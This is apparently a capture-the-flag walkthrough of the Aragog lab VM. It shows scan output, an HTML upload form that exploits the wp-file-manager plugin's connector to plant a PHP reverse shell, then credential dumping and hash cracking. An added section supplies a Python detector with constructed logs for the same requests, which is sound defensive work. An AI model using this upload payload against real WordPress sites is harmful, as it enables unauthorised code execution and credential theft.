HARRYPOTTER: ARAGOG | Vulnhub Walkthrough

Let's do another cool Vulnhub machine, this one from @Mansoor R.

Aragog is the first VM of the three-box HarryPotter series.

┌──(root💀kali)-[~/vm/arogya]
└─# nmap 192.168.1.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 10:16 IST
Nmap scan report for 192.168.1.101
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
┌──(root💀kali)-[~/vm/arogya]
└─# nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
# Nmap 7.91 scan initiated Wed May 5 14:50:04 2021 as: nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
Nmap scan report for 192.168.1.101
Host is up, received arp-response (0.00073s latency).
Scanned at 2021-05-05 14:50:05 IST for 10s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSJJ1ZAbIA3lP2RbpxnhknzLJqrHne4be3xTLmVEXWg7YQ6FFZ/RA1VzmrFYPlvB1t1XwopptI+nA9BSG5+hllLyCQ1pDZkhIwyGHuBLZETD8cIJTlsxVCwnh67h7eeK4hTEtjp1rUodK30juDf5u7JnkwVfo78LvM8WV1LjVrmhsZiqzy1CxAoMFpiRp3ZlvpblL3gdd0wgSNrGqEwc6qJc6Z+RKGkLbnpgTnOsc6vGLs1xFOGrHF2qFeDpUWti0ZDSN31LtP1HtNItbBKSECcFD3KrN8nPaZCa2V9GA1jrpOOAF1j0ehcRlBoFqLZzQbO9RFeIkgqGNrz3PDt7vp
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBESZsj5u/F88CLIXTeBD8OgiCM2u8sKBgbvvjKccwFmCBMh3GmOHGP8qzzQwVTMkq1aN0WSIk7h8/cHCT2tZLzE=
| 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMsH4OtBIy/He42Rc6KvtI6w2855JMLVloVFy5/0Rtj4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/5%OT=22%CT=1%CU=37181%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=6092634F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S
┌──(root💀kali)-[~/vm/arogya]
└─# wpscan --url http://192.168.1.101/blog/ --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive
<html><body><form method="POST" enctype="multipart/form-data" action="http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"><input type="hidden" name="cmd" value="upload"/><input type="hidden" name="target" value="l1_Lw"/><input type="file" name="upload[]"/><br/><br/><input type="submit" value="Upload"/></form></body></html>
File : /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php
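From the defender's side, the two artefacts above (a POST to the wp-file-manager elFinder connector, followed by a request for a .php file in the plugin's files directory) are what you would want to catch in the Apache access log. The detector below is an added example, not part of the walkthrough or of the plugin; the log lines are constructed, and it assumes the upload directory resolves to wp-file-manager/lib/files/ (the page shows it being reached as lib/php/../files/, so paths are normalised before matching).

```python
import posixpath
import re
from urllib.parse import urlsplit

# Constructed Apache combined-format lines (not taken from the page).
SAMPLE_LOG = """\
192.168.1.50 - - [06/May/2021:10:20:01 +0530] "GET /blog/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.1.50 - - [06/May/2021:10:20:07 +0530] "POST /blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 210 "-" "Mozilla/5.0"
192.168.1.50 - - [06/May/2021:10:20:09 +0530] "GET /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php HTTP/1.1" 200 0 "-" "curl/7.74.0"
192.168.1.51 - - [06/May/2021:10:21:00 +0530] "GET /blog/wp-login.php HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
"""

# Minimal parse of the combined log format: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths of interest (assumption: the plugin's upload directory is lib/files/).
CONNECTOR = "/wp-file-manager/lib/php/connector.minimal.php"
UPLOAD_DIR = "/wp-file-manager/lib/files/"


def normalise(request_path):
    """Strip the query string and collapse '..' so 'lib/php/../files' becomes 'lib/files'."""
    return posixpath.normpath(urlsplit(request_path).path)


def detect(log_text):
    """Return (ip, timestamp, rule, normalised_path) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the pipeline
        path = normalise(m["path"])
        if m["method"] == "POST" and path.endswith(CONNECTOR):
            # Any POST to the elFinder connector warrants a look; the
            # connector should not be reachable anonymously at all.
            findings.append((m["ip"], m["ts"], "elfinder-connector-post", path))
        elif UPLOAD_DIR in path and path.lower().endswith(".php"):
            # PHP served from the plugin's upload directory is webshell staging.
            findings.append((m["ip"], m["ts"], "php-in-upload-dir", path))
    return findings


if __name__ == "__main__":
    for ip, ts, rule, path in detect(SAMPLE_LOG):
        print(f"{ts} {ip} {rule} {path}")
```

Both rules fire on the constructed log, in order, for the same client IP. Matching on the normalised path matters: a raw substring match on `lib/files/` misses the `lib/php/../files/` form, and a WAF that blocks PHP execution under the upload directory (or removal of the plugin where it is not needed) closes the staging path altogether.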
gi**y:x:1001:1001::/home/XXXX:/bin/sh
ha****98:x:1000:1000:XXXX,,,:/home/XXXX:/bin/bash
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'my******ss');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/xxxxx/xxxxx/xxxx/xxxx');
?>
hagrid98:$P$BY**************JDHtc.
┌──(root💀kali)-[~/vm/arogya]
└─# hashcat -O -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt -o result.txt
horcrux_{RiXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXets}
horcrux_{maXXXXXXXXXXXXXXXXXXXXXXXXXXXXXOre}